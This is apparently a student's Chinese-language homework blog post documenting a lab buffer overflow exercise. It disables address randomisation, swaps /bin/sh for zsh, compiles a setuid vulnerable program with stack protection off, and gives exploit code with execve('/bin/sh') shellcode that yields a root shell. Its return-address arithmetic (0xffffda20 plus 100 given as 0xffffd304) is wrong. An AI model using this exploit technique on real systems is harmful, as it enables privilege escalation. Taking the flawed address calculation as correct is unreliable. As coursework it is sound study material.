2. 程式人生 > >第十周作業

第十周作業

阿新 發佈:2018-05-13
random 截圖 launch pri main nts 寫入 ubuntu alt

緩沖區溢出漏洞實驗

實驗聲明

本試驗是按照實驗樓的實驗指導書完成的,完成過程中除了內存地址發生變化外,部分的文件名字也有所改變,所有實驗截圖均與本身實驗指導書不同。

一、實驗簡介

緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏洞的出現是由於數據緩沖器和返回地址的暫時關閉,溢出會引起返回地址被重寫。

二、實驗準備

系統用戶名shiyanlou

實驗樓提供的是64位Ubuntu linux,而本次實驗為了方便觀察匯編語句,我們需要在32位環境下作操作,因此實驗之前需要做一些準備。

1、輸入命令安裝一些用於編譯32位C程序的東西:

sudo apt-get update

sudo apt-get install lib32z1 libc6-dev-i386

sudo apt-get install lib32readline-gplv2-dev

技術分享圖片
技術分享圖片
技術分享圖片

技術分享圖片

三、實驗步驟

3.1 初始設置

Ubuntu和其他一些Linux系統中,使用地址空間隨機化來隨機堆(heap)和棧(stack)的初始地址,這使得猜測準確的內存地址變得十分困難,而猜測內存地址是緩沖區溢出攻擊的關鍵。因此本次實驗中,我們使用以下命令關閉這一功能:

sudo sysctl -w kernel.randomize_va_space=0

技術分享圖片

此外,為了進一步防範緩沖區溢出攻擊及其它利用shell程序的攻擊,許多shell程序在被調用時自動放棄它們的特權。因此,即使你能欺騙一個Set-UID程序調用一個shell,也不能在這個shell中保持root權限,這個防護措施在/bin/bash中實現。

linux系統中,/bin/sh實際是指向/bin/bash或/bin/dash的一個符號鏈接。為了重現這一防護措施被實現之前的情形,我們使用另一個shell程序(zsh)代替/bin/bash。下面的指令描述了如何設置zsh程序:

sudo su

cd /bin

rm sh

ln -s zsh sh

exit

技術分享圖片

3.2 shellcode

一般情況下,緩沖區溢出會造成程序崩潰,在程序中,溢出的數據覆蓋了返回地址。而如果覆蓋返回地址的數據是另一個地址,那麽程序就會跳轉到該地址,如果該地址存放的是一段精心設計的代碼用於實現其他功能,這段代碼就是shellcode。

觀察以下代碼:

#include <stdio.h>
int main( ) {
char *name[2];
name[0] = ‘‘/bin/sh’’;
name[1] = NULL;
execve(name[0], name, NULL);
}

本次實驗的shellcode,就是剛才代碼的匯編版本:

\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

3.3 漏洞程序

把以下代碼保存為“stack.c”文件,保存到 當前 目錄下。代碼如下:

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
char buffer[12];

/* The following statement has a buffer overflow problem */
strcpy(buffer, str);

return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}

通過代碼可以知道,程序會讀取一個名為“badfile”的文件,並將文件內容裝入“buffer”。

編譯該程序,並設置SET-UID。命令如下:

sudo su

gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c

chmod u+s stack

exit

技術分享圖片

GCC編譯器有一種棧保護機制來阻止緩沖區溢出,所以我們在編譯代碼時需要用 –fno-stack-protector 關閉這種機制。

而 -z execstack 用於允許執行棧。

3.4 攻擊程序

我們的目的是攻擊剛才的漏洞程序,並通過攻擊獲得root權限。

把以下代碼保存為“exploit.c”文件,保存到 當前 目錄下。代碼如下:

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[]=

"\x31\xc0"    //xorl %eax,%eax
"\x50"        //pushl %eax
"\x68""//sh"  //pushl $0x68732f2f
"\x68""/bin"  //pushl $0x6e69622f
"\x89\xe3"    //movl %esp,%ebx
"\x50"        //pushl %eax
"\x53"        //pushl %ebx
"\x89\xe1"    //movl %esp,%ecx
"\x99"        //cdq
"\xb0\x0b"    //movb $0x0b,%al
"\xcd\x80"    //int $0x80
;

void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
strcpy(buffer+100,shellcode);

/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

技術分享圖片
技術分享圖片

註意上面的代碼,“\x??\x??\x??\x??”處需要添上shellcode保存在內存中的地址,因為發生溢出後這個位置剛好可以覆蓋返回地址。

而 strcpy(buffer+100,shellcode); 這一句又告訴我們,shellcode保存在 buffer+100 的位置。

現在我們要得到shellcode在內存中的地址,輸入命令:

gdb stack

disass main

結果如圖:
技術分享圖片
技術分享圖片

接下來的操作:

技術分享圖片

根據語句 strcpy(buffer+100,shellcode); 我們計算shellcode的地址為 0xffffda20(十六進制)+100(十進制)=0xffffd304(十六進制)

現在修改exploit.c文件!將 \x??\x??\x??\x?? 修改為 \x04\xd3\xff\xff

然後,編譯exploit.c程序:

gcc -m32 -o exploit exploit.c

3.5 攻擊結果

先運行攻擊程序exploit,再運行漏洞程序stack,觀察結果:

技術分享圖片

可見,通過攻擊,獲得了root權限!

如果不能攻擊成功,提示”段錯誤“,那麽請重新使用gdb反匯編,計算內存地址。

第十周作業

相關推薦

20179203 《Linux內核原理與分析》作業

計時 使用 數據 一個個 類型 原則 聲明 標識 變量 第17章 設備與模塊 一、設備類型 1. Linux及Unix系統: 塊設備 字符設備 網絡設備 2.塊設備: 通常縮寫為blkdev,它是可尋址的,尋址以塊為單位,塊大小隨設備不同而不同;塊設備通常支持重定位操作,也

2017-2018-1 20179215《Linux內核原理與分析》作業

自動填充 可移植性 智能 x86 調試 推薦 狀態 討論 ani 第17章 設備與模塊 一、設備類型 ?除了以上3種典型的設備之外,其實Linux中還有一些其他的設備類型,其中見的較多的應該算是"偽設備"。所謂"偽設備",其實就是一些虛擬的設備,僅提供訪問內核功能而已,沒

作業補做

string inf score IT 輸出 pop static .com 運行 20165326第十周課上測試補做 知識點簡介 課上代碼 1 2 ch15代碼分析 ch15課後習題 (1)使用堆棧結構輸出an的若幹項,其中a_n=2a_n-1+2a_n=2a_(n-

2017-2018-2 20179216 《網絡攻防與實踐》作業

adl code tab 安裝 困難 即使 得到 版本 內存地址 緩沖區溢出漏洞實驗 一、實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏洞的出現是由於數據緩沖器和返回地

作業

random 截圖 launch pri main nts 寫入 ubuntu alt 緩沖區溢出漏洞實驗 實驗聲明 本試驗是按照實驗樓的實驗指導書完成的,完成過程中除了內存地址發生變化外,部分的文件名字也有所改變,所有實驗截圖均與本身實驗指導書不同。 一、實驗簡介 緩沖區

2017-2018-2 20179205《網絡攻防技術與實踐》作業 緩沖區溢出攻防研究

崩潰 exe 第十周 此外 root權限 計算 進制 close bind 《網絡攻防技術與實踐》第十周作業 緩沖區溢出攻防研究 一、實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意

2017-2018-2 20179215《網絡攻防實踐》作業

運行 溢出 apt 空間 崩潰 code gcc編譯器 技術 IT 2017-2018-2 20179215 《網絡攻防實踐》 第十周作業 緩沖區溢出漏洞實踐 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,

《網絡攻防》作業

系統用戶 return 保護 strong gcc編譯 設計 初始設置 UNC state 緩沖區溢出 實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏洞的出現是由於數據

網絡攻防實踐 作業

buffer void bad add 100% mbed ogr figure 設置 網絡攻防實踐作業 html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,

2017-2018《網絡攻防技術》作業

rand 技術分享 and 死機 令行 chmod u+s -o 命令 緩沖區溢出 緩沖區溢出攻防研究 Linux 緩沖區溢出 原理 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一漏

課下作業

ear object lec 對象 for 構造方法 class sys bubuko 第十周課下作業(補做課堂測試) 一、知識點總結 1、單鏈表 創建單鏈表 鏈表中數據的插入list.add("**"); 鏈表中數據的排序Collections.sort(); 鏈表中數

20165234 《Java程序設計》課下作業

static 類型 HA set node 學生 tostring 自己 進行 教材p448 Example15_4 1. list中增加自己學號後三名同學,學號是最後三名的從1號開始加入 2. 提交運行結果截圖 3. 刻下推送代碼到碼雲 在數據結構和算法中,排序是很

課上作業

des 條目 碼雲 隱藏文件 第十周 ima 信息 time 數據信息 實現ls 任務詳情 參考偽代碼實現ls的功能,提交代碼的編譯,運行結果截圖,碼雲代碼鏈接。 打開目錄文件 針對目錄文件 讀取目錄條目 顯示文件名 關閉文件目錄文件 偽代碼 main() {

web作業

array foo www 遍歷 example scrip mozilla 構造 沒有 作業一、For each in,For in和For of(explain,examples) 一、一般的遍歷數組的方法: var array = [1,2,3,4

數據結構與算法10作業——二叉樹的創建和遍歷算法

技術分享 truct order traverse eof 結構 後序遍歷 lib void 一、二叉樹的創建算法(遞歸方式) 二、二叉樹的先序、中序和後序遍歷算法 #include<stdio.h>#include<stdlib.h>typedef

數據結構-10作業(二叉樹的創建和遍歷算法)

樹的創建 創建 -1 數據結構 二叉 分享 com jpg 遍歷算法 數據結構-第10周作業(二叉樹的創建和遍歷算法)

《網絡攻防》學習總結

log 64位 位置 uid 操作 fff 指令 攻擊 匯編 緩沖區溢出漏洞實踐 由於實驗樓提供的是64位操作系統,而本次實驗為了方便觀察匯編語句,采用32位操作系統,所以先按照要求進行一些必要的準備 先按順序輸入下面的三個命令安裝32位操作系統 安裝好之

機電傳動控制作業作業補充

http 進行 .cn logs 第九周作業 images 需要 我想 ges 機電傳動控制作業第九周作業補充: 手繪波形圖: 3. 直流電機開環調壓調速系統模型搭建 搭建的電路圖: 仿真結果之一: 問題: 我按照上圖所示的電路進行仿真時,在調節電源電壓的大

Linux系統管理作業【Linux微職位】

bash腳本編程1、寫一個腳本,判斷當前系統上所有用戶的shell是否為可登錄shell(即用戶的shell不是/sbin/nologin);分別這兩類用戶的個數;通過字符串比較來實現;[[email protected]/* */ ~]# vim usershell.sh #!/bin/bash

Linux服務及安全管理作業【Linux微職位】

加密解密技術;ca;dns1、詳細描述一次加密通訊的過程,結合圖示最佳。一次完整的加密通訊過程如下:通訊的雙方需要事先協商好單向加密算法,並交換各自的公鑰發送端加密過程1、發送端先用單向加密算法計算出數據的特征碼2、發送端用自己的私鑰加密特征碼,生成數字簽名,並將該數字簽名附加在數據之後3、發送端生成一個臨時